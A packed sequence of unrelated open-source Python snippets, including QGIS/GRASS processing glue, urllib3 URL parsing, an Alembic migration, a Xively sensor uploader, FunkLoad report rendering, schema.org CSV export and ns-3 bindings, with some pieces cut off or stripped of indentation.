* (at your option) any later version. *
* *
***************************************************************************
"""
__author__ = 'Médéric Ribreux'
__date__ = 'February 2016'
__copyright__ = '(C) 2016, Médéric Ribreux'
# This will get replaced with a git SHA1 when you do a git archive
__revision__ = '$Format:%H$'
import os
def checkParameterValuesBeforeExecuting(alg, parameters, context):
""" Verify if we have the right parameters """
if (alg.parameterAsString(parameters, 'expression', context)
and alg.parameterAsString(parameters, 'file', context)):
return False, alg.tr("You need to set either inline expression or a rules file!")
return True, None
def processInputs(alg, parameters, context, feedback):
# We will use the same raster names than in QGIS to name the rasters in GRASS
rasters = alg.parameterAsLayerList(parameters, 'maps', context)
for idx, raster in enumerate(rasters):
rasterName = os.path.splitext(
os.path.basename(raster.source()))[0]
alg.inputLayers.append(raster)
alg.setSessionProjectionFromLayer(raster)
command = 'r.in.gdal input="{0}" output="{1}" --overwrite -o'.format(
os.path.normpath(raster.source()),
rasterName)
alg.commands.append(command)
alg.removeParameter('maps')
alg.postInputs()
def processCommand(alg, parameters, context, feedback):
alg.processCommand(parameters, context, feedback, True)
def processOutputs(alg, parameters, context, feedback):
# We need to export every raster from the GRASSDB
alg.exportRasterLayersIntoDirectory('output_dir',
parameters, context,
wholeDB=True)
|
# -*-coding:UTF-8 -*
import sqlite3 as sql
import json
from time import time, strftime
import settings
import logging as lgn
lgn.basicConfig(filename='/db/db.log', level=lgn.DEBUG,
                format='%(asctime)s %(message)s')
def logit(string, *level):
    if len(level) == 0:
        lgn.info(string)
    elif level[0] == 10:
        lgn.debug(string)
    elif level[0] == 20:
        lgn.info(string)
    elif level[0] == 30:
        lgn.warning(string)
    elif level[0] == 40:
        lgn.error(string)
    else:
        lgn.critical(string)
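# Editor's usage sketch; the numeric levels are the stdlib logging constants
# (DEBUG=10, INFO=20, WARNING=30, ERROR=40, anything else -> CRITICAL):
#
#     logit('starting crawl')      # no level -> info
#     logit('bad response', 40)    # 40 -> error
#     logit('unknown state', 99)   # fallback -> critical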
def clean_listings():
conn,c = get_conn()
#first the easy thing: let's delete all the listings that are not
#linked to any search anymore
c.execute('''delete from listings where id not in
(select listingid from search_listings)''')
conn.commit()
#now let's delete all the listings older than max age
max_age = time() - settings.n_days_before_del * 86400
c.execute('''delete from listings where date_added <= ?''',(max_age,))
conn.commit()
def get_conn():
conn = sql.connect("/db/spider_nest.db")
c = conn.cursor()
c.execute('''PRAGMA foreign_keys = ON''')
return conn,c
def add_error_listings(site,conn,c):
siteid = c.execute('select id from websites where url = ?',(site,)).fetchone()
searches = c.execute('select id from searches where websiteid = ?',siteid).fetchall()
try:
c.execute('''insert into listings(websiteid,desc,webid,img,url,date_added) values(
?,'NO PLUGIN AVAILABLE','NA','NA','NA',?)''',(siteid[0],time()))
except sql.IntegrityError:
logit('tried to add a no plugin available listing for {} twice. Normal behaviour.'.format(site))
#nothing fancy here, we just tried to add a no plugin available listing
#twice, since it's already there our work here is done
return
listingid = c.execute('select id from listings where websiteid = ?',siteid).fetchone()
for s in searches:
c.execute('''insert into search_listings(searchid,listingid)
values(?,?)''',(s[0],listingid[0]))
conn.commit()
|
t is None:
return None
if self.port:
return f"{self.host}:{self.port}"
return self.host
@property
def url(self) -> str:
"""
Convert self into a url
This function should more or less round-trip with :func:`.parse_url`. The
returned url may not be exactly the same as the url inputted to
:func:`.parse_url`, but it should be equivalent by the RFC (e.g., urls
with a blank port will have : removed).
Example:
.. code-block:: python
import urllib3
U = urllib3.util.parse_url("https://google.com/mail/")
print(U.url)
# "https://google.com/mail/"
print( urllib3.util.Url("https", "username:password",
"host.com", 80, "/path", "query", "fragment"
).url
)
# "https://username:password@host.com:80/path?query#fragment"
"""
scheme, auth, host, port, path, query, fragment = self
url = ""
# We use "is not None" we want things to happen with empty strings (or 0 port)
if scheme is not None:
url += scheme + "://"
if auth is not None:
url += auth + "@"
if host is not None:
url += host
if port is not None:
url += ":" + str(port)
if path is not None:
url += path
if query is not None:
url += "?" + query
if fragment is not None:
url += "#" + fragment
return url
def __str__(self) -> str:
return self.url
@overload
def _encode_invalid_chars(
component: str, allowed_chars: Container[str]
) -> str: # Abstract
...
@overload
def _encode_invalid_chars(
component: None, allowed_chars: Container[str]
) -> None: # Abstract
...
def _encode_invalid_chars(
component: Optional[str], allowed_chars: Container[str]
) -> Optional[str]:
"""Percent-encodes a URI component without reapplying
onto an already percent-encoded component.
"""
if component is None:
return component
component = to_str(component)
# Normalize existing percent-encoded bytes.
# Try to see if the component we're encoding is already percent-encoded
# so we can skip all '%' characters but still encode all others.
component, percent_encodings = _PERCENT_RE.subn(
lambda match: match.group(0).upper(), component
)
uri_bytes = component.encode("utf-8", "surrogatepass")
is_percent_encoded = percent_encodings == uri_bytes.count(b"%")
encoded_component = bytearray()
for i in range(0, len(uri_bytes)):
# Will return a single character bytestring
byte = uri_bytes[i : i + 1]
byte_ord = ord(byte)
if (is_percent_encoded and byte == b"%") or (
byte_ord < 128 and byte.decode() in allowed_chars
):
encoded_component += byte
continue
encoded_component.extend(b"%" + (hex(byte_ord)[2:].encode().zfill(2).upper()))
return encoded_component.decode()
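# Behaviour sketch for the helper above (assumes the module-level
# _UNRESERVED_CHARS set used by _normalize_host below):
#   _encode_invalid_chars("%2f", _UNRESERVED_CHARS)  -> "%2F"   (normalized, not re-encoded)
#   _encode_invalid_chars("a/b", _UNRESERVED_CHARS)  -> "a%2Fb" ('/' is not unreserved)
#   _encode_invalid_chars(None, _UNRESERVED_CHARS)   -> None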
def _remove_path_dot_segments(path: str) -> str:
# See http://tools.ietf.org/html/rfc3986#section-5.2.4 for pseudo-code
segments = path.split("/") # Turn the path into a list of segments
output = [] # Initialize the variable to use to store output
for segment in segments:
# '.' is the current directory, so ignore it, it is superfluous
if segment == ".":
continue
# Anything other than '..', should be appended to the output
if segment != "..":
output.append(segment)
# In this case segment == '..', if we can, we should pop the last
# element
elif output:
output.pop()
# If the path starts with '/' and the output is empty or the first string
# is non-empty
if path.startswith("/") and (not output or output[0]):
output.insert(0, "")
# If the path starts with '/.' or '/..' ensure we add one more empty
# string to add a trailing '/'
if path.endswith(("/.", "/..")):
output.append("")
return "/".join(output)
def _normalize_host(host: Optional[str], scheme: Optional[str]) -> Optional[str]:
if host:
if scheme in _NORMALIZABLE_SCHEMES:
is_ipv6 = _IPV6_ADDRZ_RE.match(host)
if is_ipv6:
match = _ZONE_ID_RE.search(host)
if match:
start, end = match.span(1)
zone_id = host[start:end]
if zone_id.startswith("%25") and zone_id != "%25":
zone_id = zone_id[3:]
else:
zone_id = zone_id[1:]
zone_id = _encode_invalid_chars(zone_id, _UNRESERVED_CHARS)
return f"{host[:start].lower()}%{zone_id}{host[end:]}"
else:
return host.lower()
elif not _IPV4_RE.match(host):
return to_str(
b".".join([_idna_encode(label) for label in host.split(".")]),
"ascii",
)
return host
def _idna_encode(name: str) -> bytes:
if name and any([ord(x) > 128 for x in name]):
try:
import idna
except ImportError:
raise LocationParseError(
"Unable to parse URL without the 'idna' module"
) from None
try:
return idna.encode(name.lower(), strict=True, std3_rules=True)
except idna.IDNAError:
raise LocationParseError(
f"Name '{name}' is not a valid IDNA label"
) from None
return name.lower().encode("ascii")
def _encode_target(target: str) -> str:
"""Percent-encodes a request target so that there are no invalid characters
Pre-condition for this function is that 'target' must start with '/'.
If that is the case then _TARGET_RE will always produce a match.
"""
match = _TARGET_RE.match(target)
if not match: # Defensive:
raise LocationParseError(f"{target!r} is not a valid request URI")
path, query = match.groups()
encoded_target = _encode_invalid_chars(path, _PATH_CHARS)
if query is not None:
query = _encode_invalid_chars(query, _QUERY_CHARS)
encoded_target += "?" + query
return encoded_target
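# Sketch of the resulting behaviour (assuming _TARGET_RE splits "<path>?<query>"
# as described above): the query is percent-encoded, the path left intact:
#   _encode_target("/path?q=a b") -> "/path?q=a%20b"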
def parse_url(url: str) -> Url:
"""
Given a url, return a parsed :class:`.Url` namedtuple. Best-effort is
performed to parse incomplete urls. Fields not provided will be None.
This parser is RFC 3986 compliant.
The parser logic and helper functions are based heavily on
work done in the ``rfc3986`` module.
:param str url: URL to parse into a :class:`.Url` namedtuple.
Partly backwards-compatible with :mod:`urlparse`.
Example:
.. code-block:: python
import urllib3
print( urllib3.util.parse_url('http://google.com/mail/'))
# Url(scheme='http', host='google.com', port=None, path='/mail/', ...)
print( urllib3.util.parse_url('google.com:80'))
# Url(scheme=None, host='google.com', port=80, path=None, ...)
print( urllib3.util.parse_url('/foo?bar'))
# Url(scheme=None, host=None, port=None, path='/foo', query='bar', ...)
"""
if not url:
# Empty
return Url()
source_url = url
if not _SCHEME_RE.search(url):
url = "//" | + url
scheme: Optional[str]
authority: Optional[str]
auth: Optional[str]
host: Optional[str]
port: Optional[str]
port_int: Optional[int]
path: Optional[str]
query: Optional[str]
fragment: Optional[str]
try:
scheme, authority, path, query, fragment = _URI_RE.match(url).groups() # type: ignore[union-attr]
normalize_uri = scheme is None or scheme.lower() in _NORMALIZABLE_SCHEMES
if scheme:
scheme = scheme.lower()
if authority:
auth, _, host_port = authority.rpartition("@")
auth = auth or None
host, port = _HOST_PORT_RE.match(host_port).groups()  # type: ignore[union-attr]
#!/usr/bin/env python
import argparse
import datetime
import os
import re
import requests
import subprocess
import sys
import time
import xively
DEBUG = os.environ.get("DEBUG", False)
def read_temperature(from_file):
if DEBUG:
print "Reading temperature from file: %s" % from_file
temperature = None
with open(from_file, 'r') as f:
crc = f.readline()
reading = f.readline()
matches = re.search('t=(\d+)', reading)
if matches:
temperature = float(matches.group(1)) / 1000.0
return temperature
def get_datastream(feed, name):
try:
datastream = feed.datastreams.get(name)
if DEBUG:
print "Found existing datastream"
return datastream
except Exception:
if DEBUG:
print "Creating new datastream"
datastream = feed.datastreams.create(name, tags="units=celsius")
return datastream
def run():
parser = argparse.ArgumentParser(description = 'Push a metric to Xively')
parser.add_argument('--feed', type=str, required=True, help='your Xively feed ID')
parser.add_argument('--key', type=str, required=True, help='your Xively API key')
parser.add_argument('--name', type=str, default='temperature0', help='your Xively datastream name')
parser.add_argument('--file', type=str, required=True, help='the file from which to read the temperature')
args = parser.parse_args()
api = xively.XivelyAPIClient(args.key)
feed = api.feeds.get(args.feed)
datastream = get_datastream(feed, args.name)
datastream.max_value = None
datastream.min_value = None
while True:
temperature = read_temperature(args.file)
if DEBUG:
print "Updating Xively feed with value: %s" % temperature
datastream.current_value = temperature
datastream.at = datetime.datetime.utcnow()
try:
datastream.update()
except Exception as err:
sys.stderr.write('ERROR: %s\n' % str(err))
print "Updated Xively feed, sleeping..."
time.sleep(60)
if __name__ == '__main__':
    run()
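# Parsing sketch: read_temperature() expects a DS18B20-style w1_slave file
# (an assumption based on the "t=" regex above), e.g.
#   73 01 4b 46 7f ff 0d 10 41 : crc=41 YES
#   73 01 4b 46 7f ff 0d 10 41 t=23187
# for which it returns 23187 / 1000.0 == 23.187 degrees Celsius.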
|
# Copyright 2015 CloudFounders NV
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
This package contains Linux OS distribution extensions
"""
|
"""db migration
Revision ID: 373a21295ab
Revises: 21f5b2d3905d
Create Date: 2015-05-05 15:42:33.474470
"""
# revision identifiers, used by Alembic.
revision = '373a21295ab'
down_revision = '21f5b2d3905d'
branch_labels = None
depends_on = None
from alembic import op
import sqlalchemy as sa
def upgrade():
op.drop_table('items')
items = op.create_table('items',
sa.Column('id', sa.Integer, primary_key=True),
sa.Column('name', sa.String(255), nullable=False),
sa.Column('is_bought', sa.Boolean, default=False, nullable=False),
sa.Column('created', sa.DateTime, default=sa.func.now(),
nullable=False),
sa.Column('modified', sa.DateTime, default=sa.func.now(),
onupdate=sa.func.now(), nullable=False))
def downgrade():
op.drop_table('items')
op.create_table('items',
sa.Column('id', sa.Integer, primary_key=True),
sa.Column('name', sa.String(255), nullable=False),
sa.Column('is_bought', sa.Boolean, default=False, nullable=False),
sa.Column('modified', sa.DateTime, default=sa.func.now(),
onupdate=sa.func.now(), nullable=False),
sa.Column('created', sa.DateTime, default=sa.func.now()))
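# Sketch: applying this revision programmatically (assumes a standard
# alembic.ini for this project; the CLI equivalent is "alembic upgrade head").
# Illustrative only -- not part of the migration module itself:
#
#     from alembic.config import Config
#     from alembic import command
#     cfg = Config("alembic.ini")          # hypothetical config path
#     command.upgrade(cfg, "373a21295ab")  # revert: command.downgrade(cfg, "21f5b2d3905d")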
|
from ..library.base import number_to_list
def solve(bound: int=100):
maximal = 0
for a in range(bound):
for b in range(bound):
sum_digits = sum(number_to_list(a ** b))
if sum_digits > maximal:
maximal = sum_digits
return maximal
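# Self-contained check (assumes number_to_list(n) returns the decimal digits of
# n, so the inner sum is a digit sum; bound=100 is Project Euler problem 56,
# whose maximal digit sum is 972):
if __name__ == "__main__":
    def digit_sum(n):
        return sum(int(d) for d in str(n))
    print(max(digit_sum(a ** b) for a in range(100) for b in range(100)))  # 972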
|
# (C) Copyright 2011 Nuxeo SAS <http://nuxeo.com>
# Author: bdelbosc@nuxeo.com
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2 as published
# by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
# 02111-1307, USA.
#
"""Classes that render statistics in emacs org-mode format.
"""
import re
from ReportRenderRst import RenderRst
from ReportRenderRst import BaseRst
import ReportRenderRst
from MonitorPlugins import MonitorPlugins
FL_SITE = "http://funkload.nuxeo.org"
def org_title(title, level=1, newpage=True):
"""Return an org section."""
org = []
if newpage:
org.append("")
org.append("")
org.append("#+BEGIN_LaTeX")
org.append("\\newpage")
org.append('#+END_LaTeX')
org.append('*' * (level - 1) + ' ' + title + '\n')
return '\n'.join(org)
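# Example: org_title("Results", level=2) emits the LaTeX \newpage block
# followed by "* Results" -- one '*' per (level - 1).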
def org_image(self):
org = ["#+BEGIN_LaTeX"]
org.append('\\begin{center}')
for image_name in self.image_names:
org.append("\includegraphics[scale=0.5]{{./%s}.png}" % image_name)
org.append('\\end{center}')
org.append('#+END_LaTeX')
return '\n'.join(org) + '\n'
def org_header(self, with_chart=False):
headers = self.headers[:]
if self.with_percentiles:
self._attach_percentiles_header(headers)
org = [self.render_image()]
org.append("#+BEGIN_LaTeX")
org.append("\\tiny")
org.append('#+END_LaTeX')
org.append(' |' + '|'.join(headers) + '|\n |-')
return '\n'.join(org)
def org_footer(self):
org = [' |-']
org.append("#+BEGIN_LaTeX")
org.append("\\normalsize")
org.append('#+END_LaTeX')
return '\n'.join(org)
ReportRenderRst.rst_title = org_title
ReportRenderRst.LI = '-'
BaseRst.render_header = org_header
BaseRst.render_footer = org_footer
BaseRst.render_image = org_image
BaseRst.sep = '|'
class RenderOrg(RenderRst):
"""Render stats in ReST format."""
# number of slowest requests to display
slowest_items = 5
with_chart = True
def __init__(self, config, stats, error, monitor, monitorconfig, options):
options.html = True
RenderRst.__init__(self, config, stats, error, monitor, monitorconfig, options)
def renderHeader(self):
config = self.config
self.append('# -*- mode: org -*-')
self.append('#+TITLE: FunkLoad bench report')
self.append('#+DATE: ' + self.date)
self.append('''#+STYLE: <link rel="stylesheet" type="text/css" href="eon.css" />
#+LaTeX_CLASS: koma-article
#+LaTeX_CLASS_OPTIONS: [a4paper,landscape]
#+LATEX_HEADER: \usepackage[utf8]{inputenc}
#+LATEX_HEADER: \usepackage[en]{babel}
#+LATEX_HEADER: \usepackage{fullpage}
#+LATEX_HEADER: \usepackage[hyperref,x11names]{xcolor}
#+LATEX_HEADER: \usepackage[colorlinks=true,urlcolor=SteelBlue4,linkcolor=Firebrick4]{hyperref}
#+LATEX_HEADER: \usepackage{graphicx}
#+LATEX_HEADER: \usepackage[T1]{fontenc}''')
description = [config['class_description']]
description += ["Bench result of ``%s.%s``: " % (config['class'],
config['method'])]
description += [config['description']]
self.append('#+TEXT: Bench result of =%s.%s=: %s' % (
config['class'], config['method'], ' '.join(description)))
self.append('#+OPTIONS: toc:1')
self.append('')
def renderMonitor(self, host, charts):
"""Render a monitored host."""
description = self.config.get(host, '')
self.append(org_title("%s: %s" % (host, description), 3))
for chart in charts:
self.append('#+BEGIN_LaTeX')
self.append('\\begin{center}')
self.append("\includegraphics[scale=0.5]{{./%s}.png}" % chart[1])
self.append('\\end{center}')
self.append('#+END_LaTeX')
def renderHook(self):
self.rst = [line.replace('``', '=') for line in self.rst]
lapdex = "Apdex_{%s}" % str(self.options.apdex_t)
kv = re.compile("^(\ *\- [^\:]*)\:(.*)")
bold = re.compile("\*\*([^\*]+)\*\*")
link = re.compile("\`([^\<]+)\<([^\>]+)\>\`\_")
ret = []
for line in self.rst:
line = re.sub(kv, lambda m: "%s :: %s\n\n" % (
m.group(1), m.group(2)), line)
line = re.sub(bold, lambda m: "*%s*" % (m.group(1)),
line)
line = re.sub(link, lambda m: "[[%s][%s]]" % (m.group(2),
m.group(1).strip()),
line)
line = line.replace('|APDEXT|', lapdex)
line = line.replace('Apdex*', lapdex)
line = line.replace('Apdex T', 'Apdex_{T}')
line = line.replace('FunkLoad_',
'[[%s][FunkLoad]]' % FL_SITE)
ret.append(line)
self.rst = ret
def createMonitorCharts(self):
"""Create all montirored server charts."""
if not self.monitor or not self.with_chart:
return
self.append(org_title("Monitored hosts", 2))
charts = {}
for host in self.monitor.keys():
charts[host] = self.createMonitorChart(host)
return charts
def createMonitorChart(self, host):
"""Create m | onitrored server chart | s."""
charts = []
Plugins = MonitorPlugins()
Plugins.registerPlugins()
Plugins.configure(self.getMonitorConfig(host))
for plugin in Plugins.MONITORS.values():
image_path = ('%s_%s' % (host, plugin.name)).replace("\\", "/")
charts.append((plugin.name, image_path))
return charts
|
# -*- encoding: utf-8 -*-
# Module iainfgen
from numpy import *
def iainfgen(f, Iab):
from iaunion import iaunion
from iadil import iadil
from ianeg import ianeg
A, Bc = Iab
y = iaunion( iadil(f, A), iadil( ianeg(f), Bc))
return y
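# A self-contained sketch of the same operator (the union of two dilations),
# using scipy as a stand-in for the ia636 helpers (iadil -> binary_dilation,
# ianeg -> logical_not, iaunion -> logical_or); (A, Bc) is the structuring pair:
import numpy as np
from scipy.ndimage import binary_dilation

def infgen(f, A, Bc):
    return np.logical_or(binary_dilation(f, structure=A),
                         binary_dilation(np.logical_not(f), structure=Bc))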
def setqueryGraph(self,graph=None):
self.queryGraph = graph
def setfullGraph(self,graph=None):
self.fullGraph = graph
def setexcludeAttic(self,state):
self.excludeAttic = state
def setmarkdownComments(self,state):
self.markdown = state
def doQuery(self,graph=None,query=None):
res = None
try:
RDFLIBLOCK.acquire()
res = list(graph.query(query))
finally:
RDFLIBLOCK.release()
return res
def outputCSVtypes(self,file):
atticfilter = ""
if self.excludeAttic:
atticfilter = "FILTER NOT EXISTS {?term schema:isPartOf <http://attic.schema.org>}."
query= ('''select ?term where {
?term a ?type.
BIND(STR(?term) AS ?strVal)
FILTER NOT EXISTS {?term a rdf:Property}.
FILTER(STRLEN(?strVal) >= 18 && SUBSTR(?strVal, 1, 18) = "http://schema.org/").
%s
}
ORDER BY ?term
''') % atticfilter
try:
RDFLIBLOCK.acquire()
types = list(self.queryGraph.query(query))
finally:
RDFLIBLOCK.release()
#log.info( "Types: %s" % len(types))
self.type2CSV(header=True,out=file)
for t in types:
self.type2CSV(term=t.term,header=False,out=file,graph=self.queryGraph)
def outputCSVproperties(self,file):
atticfilter = ""
if self.excludeAttic:
atticfilter = "FILTER NOT EXISTS {?term schema:isPartOf <http://attic.schema.org>}."
query= ('''select ?term where {
?term a rdf:Property.
FILTER EXISTS {?term rdfs:label ?l}.
BIND(STR(?term) AS ?strVal).
FILTER(STRLEN(?strVal) >= 18 && SUBSTR(?strVal, 1, 18) = "http://schema.org/").
%s
}
ORDER BY ?term''') % atticfilter
props = list(self.queryGraph.query(query))
self.prop2CSV(header=True,out=file)
for t in props:
self.prop2CSV(term=t.term,header=False,out=file,graph=self.queryGraph)
def prop2CSV(self,term=None,header=True,out=None,graph=None):
cols = ["id","label","comment","subPropertyOf","equivalentProperty","subproperties","domainIncludes","rang | eIncludes","inverseOf","supersedes","supersededBy","isPartOf"]
if not out:
return
writer = csv.writer(out,quoting=csv.QUOTE_ALL,lineterminator='\n')
if header:
writer.writerow(cols)
return
if not graph:
graph = self.queryGraph
if term == None or graph == None:
return
row = [str(term)]
row.append(self.graphValueToCSV(subject=term,predicate=RDFS.label,graph=graph))
row.append(self.getCSVComment(term,graph=self.fullGraph))
row.append(self.getCSVSuperProperties(term,graph=self.fullGraph))
row.append(self.graphValueToCSV(subject=term,predicate=OWL.equivalentProperty,graph=graph))
row.append(self.getCSVSubProperties(term,graph=self.fullGraph))
row.append(self.getCSVDomainIncludes(term,graph=self.fullGraph))
row.append(self.getCSVRangeIncludes(term,graph=self.fullGraph))
row.append(self.graphValueToCSV(subject=term,predicate=URIRef("http://schema.org/inverseOf"),graph=graph))
row.append(self.getCSVsuperseds(term,graph=self.fullGraph))
row.append(self.getCSVSupersededBy(term,graph=self.fullGraph))
row=[s.encode('utf-8') for s in row]
writer.writerow(row)
#print term
def type2CSV(self,term=None,header=True,out=None,graph=None):
cols = ["id","label","comment","subTypeOf","enumerationtype","equivalentClass","properties","subTypes","supersedes","supersededBy","isPartOf"]
if not out:
return
writer = csv.writer(out,quoting=csv.QUOTE_ALL,lineterminator='\n')
if header:
writer.writerow(cols)
return
if not graph:
graph = self.queryGraph
if term == None or graph == None:
return
if not isinstance(term, URIRef):
term = URIRef(term)
enumType = self.graphValueToCSV(subject=term,predicate=RDF.type,graph=graph)
if enumType.endswith("#Class"):
enumType = ""
row = [str(term)]
row.append(self.graphValueToCSV(subject=term,predicate=RDFS.label,graph=graph))
row.append(self.getCSVComment(term,graph=self.fullGraph))
row.append(self.getCSVSupertypes(term,graph=self.fullGraph))
row.append(enumType)
row.append(self.graphValueToCSV(subject=term,predicate=OWL.equivalentClass,graph=graph))
row.append(self.getCSVTypeProperties(term,graph=self.fullGraph))
row.append(self.getCSVSubtypes(term,graph=self.fullGraph))
row.append(self.getCSVsuperseds(term,graph=self.fullGraph))
row.append(self.getCSVSupersededBy(term,graph=self.fullGraph))
row.append(self.graphValueToCSV(subject=term,predicate=URIRef("http://schema.org/isPartOf"),graph=graph))
row=[s.encode('utf-8') for s in row]
writer.writerow(row)
def graphValueToCSV(self, subject=None, predicate= None, object= None, graph=None):
ret = ""
try:
RDFLIBLOCK.acquire()
ret = str(graph.value(subject=subject,predicate=predicate,object=object))
finally:
RDFLIBLOCK.release()
if ret == None or ret == "None":
ret = ""
return ret
def getCSVSupertypes(self,term=None,graph=None):
query='''select ?sup where{
<%s> rdfs:subClassOf ?sup.
BIND(STR(?sup) AS ?strVal)
FILTER(STRLEN(?strVal) >= 18 && SUBSTR(?strVal, 1, 18) = "http://schema.org/")
}
ORDER BY ?sup''' % term
res = self.doQuery(graph,query)
ret = ', '.join([x.sup for x in res])
return ret
def getCSVTypeProperties(self,term=None,graph=None):
atticfilter = ""
if self.excludeAttic:
atticfilter = "FILTER NOT EXISTS {?prop schema:isPartOf <http://attic.schema.org>.}"
query='''select DISTINCT ?prop where{
?term (^rdfs:subClassOf*) <%s>.
?prop <http://schema.org/domainIncludes> ?term.
%s
}
ORDER BY ?prop''' % (term,atticfilter)
res = self.doQuery(graph,query)
ret = ', '.join([x.prop for x in res])
return ret
def getCSVSubtypes(self,term=None,graph=None):
atticfilter = ""
if self.excludeAttic:
atticfilter = "FILTER NOT EXISTS {?sub schema:isPartOf <http://attic.schema.org>.}"
query='''select ?sub where{
?sub rdfs:subClassOf <%s>.
%s
}
ORDER BY ?sub''' % (term,atticfilter)
res = self.doQuery(graph,query)
ret = ', '.join([x.sub for x in res])
#print "SUBTYPES of %s: '%s'" % (term,ret)
return ret
def getCSVSupersededBy(self,term=None,graph=None):
atticfilter = ""
if self.excludeAttic:
atticfilter = "FILTER NOT EXISTS {?sub schema:isPartOf <http://attic.schema.org>.}"
query='''select ?sup where{
<%s> schema:supersededBy ?sup.
%s
}
ORDER BY ?sup''' % (term,atticfilter)
res = self.doQuery(graph,query)
ret = ', '.join([x.sup for x in res])
#print "%s supercededBy: '%s'" % (term,ret)
return ret
def getCSVsuperseds(self,term=None,graph=None):
atticfilter = ""
if self.excludeAttic:
atticfilter = "FILTER NOT EXISTS {?sup schema:isPartOf <http://attic.schema.org>.}"
query='''select ?sup where{
?sup schema:supersededBy <%s>.
%s
}
ORDER BY ?sup''' % (term,atticfilter)
res = self.doQuery(graph,query)
ret = ', '.join([x.sup for x in res])
#print "%s superseds: '%s'" % (term,ret)
return ret
def getCSVSuperProperties(self,term=None,graph=None):
query='''select ?sup where{
<%s> rdfs:subPropertyOf ?sup.
transfer_ownership=False), param('std::string', 'context'), param('ns3::CallbackBase const &', 'cb')],
is_pure_virtual=True, is_const=True, is_virtual=True)
## trace-source-accessor.h (module 'core'): bool ns3::TraceSourceAccessor::ConnectWithoutContext(ns3::ObjectBase * obj, ns3::CallbackBase const & cb) const [member function]
cls.add_method('ConnectWithoutContext',
'bool',
[param('ns3::ObjectBase *', 'obj', transfer_ownership=False), param('ns3::CallbackBase const &', 'cb')],
is_pure_virtual=True, is_const=True, is_virtual=True)
## trace-source-accessor.h (module 'core'): bool ns3::TraceSourceAccessor::Disconnect(ns3::ObjectBase * obj, std::string context, ns3::CallbackBase const & cb) const [member function]
cls.add_method('Disconnect',
'bool',
[param('ns3::ObjectBase *', 'obj', transfer_ownership=False), param('std::string', 'context'), param('ns3::CallbackBase const &', 'cb')],
is_pure_virtual=True, is_const=True, is_virtual=True)
## trace-source-accessor.h (module 'core'): bool ns3::TraceSourceAccessor::DisconnectWithoutContext(ns3::ObjectBase * obj, ns3::CallbackBase const & cb) const [member function]
cls.add_method('DisconnectWithoutContext',
'bool',
[param('ns3::ObjectBase *', 'obj', transfer_ownership=False), param('ns3::CallbackBase const &', 'cb')],
is_pure_virtual=True, is_const=True, is_virtual=True)
return
def register_Ns3Trailer_methods(root_module, cls):
cls.add_output_stream_operator()
## trailer.h (module 'network'): ns3::Trailer::Trailer() [constructor]
cls.add_constructor([])
## trailer.h (module 'network'): ns3::Trailer::Trailer(ns3::Trailer const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Trailer const &', 'arg0')])
## trailer.h (module 'network'): uint32_t ns3::Trailer::Deserialize(ns3::Buffer::Iterator end) [member function]
cls.add_method('Deserialize',
'uint32_t',
[param('ns3::Buffer::Iterator', 'end')],
is_pure_virtual=True, is_virtual=True)
## trailer.h (module 'network'): uint32_t ns3::Trailer::GetSerializedSize() const [member function]
cls.add_method('GetSerializedSize',
'uint32_t',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## trailer.h (module 'network'): static ns3::TypeId ns3::Trailer::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## trailer.h (module 'network'): void ns3::Trailer::Print(std::ostream & os) const [member function]
cls.add_method('Print',
'void',
[param('std::ostream &', 'os')],
is_pure_virtual=True, is_const=True, is_virtual=True)
## trailer.h (module 'network'): void ns3::Trailer::Serialize(ns3::Buffer::Iterator start) const [member function]
cls.add_method('Serialize',
'void',
[param('ns3::Buffer::Iterator', 'start')],
is_pure_virtual=True, is_const=True, is_virtual=True)
return
def register_Ns3Application_methods(root_module, cls):
## application.h (module 'network'): ns3::Application::Application(ns3::Application const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Application const &', 'arg0')])
## application.h (module 'network'): ns3::Application::Application() [constructor]
cls.add_constructor([])
## application.h (module 'network'): ns3::Ptr<ns3::Node> ns3::Application::GetNode() const [member function]
cls.add_method('GetNode',
'ns3::Ptr< ns3::Node >',
[],
is_const=True)
## application.h (module 'network'): static ns3::TypeId ns3::Application::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## application.h (module 'network'): void ns3::Application::SetNode(ns3::Ptr<ns3::Node> node) [member function]
cls.add_method('SetNode',
'void',
[param('ns3::Ptr< ns3::Node >', 'node')])
## application.h (module 'network'): void ns3::Application::SetStartTime(ns3::Time start) [member function]
cls.add_method('SetStartTime',
'void',
[param('ns3::Time', 'start')])
## application.h (module 'network'): void ns3::Application::SetStopTime(ns3::Time stop) [member function]
cls.add_method('SetStopTime',
'void',
[param('ns3::Time', 'stop')])
## application.h (module 'network'): void ns3::Application::DoDispose() [member function]
cls.add_method('DoDispose',
'void',
[],
visibility='protected', is_virtual=True)
## application.h (module 'network'): void ns3::Application::DoStart() [member function]
cls.add_method('DoStart',
'void',
[],
visibility='protected', is_virtual=True)
## application.h (module 'network'): void ns3::Application::StartApplication() [member function]
cls.add_method('StartApplication',
'void',
[],
visibility='private', is_virtual=True)
## application.h (module 'network'): void ns3::Application::StopApplication() [member function]
cls.add_method('StopApplication',
'void',
[],
visibility='private', is_virtual=True)
return
def register_Ns3AttributeAccessor_methods(root_module, cls):
## attribute.h (module 'core'): ns3::AttributeAccessor::AttributeAccessor(ns3::AttributeAccessor const & arg0) [copy constructor]
cls.add_constructor([param('ns3::AttributeAccessor const &', 'arg0')])
## attribute.h (module 'core'): ns3::AttributeAccessor::AttributeAccessor() [constructor]
cls.add_constructor([])
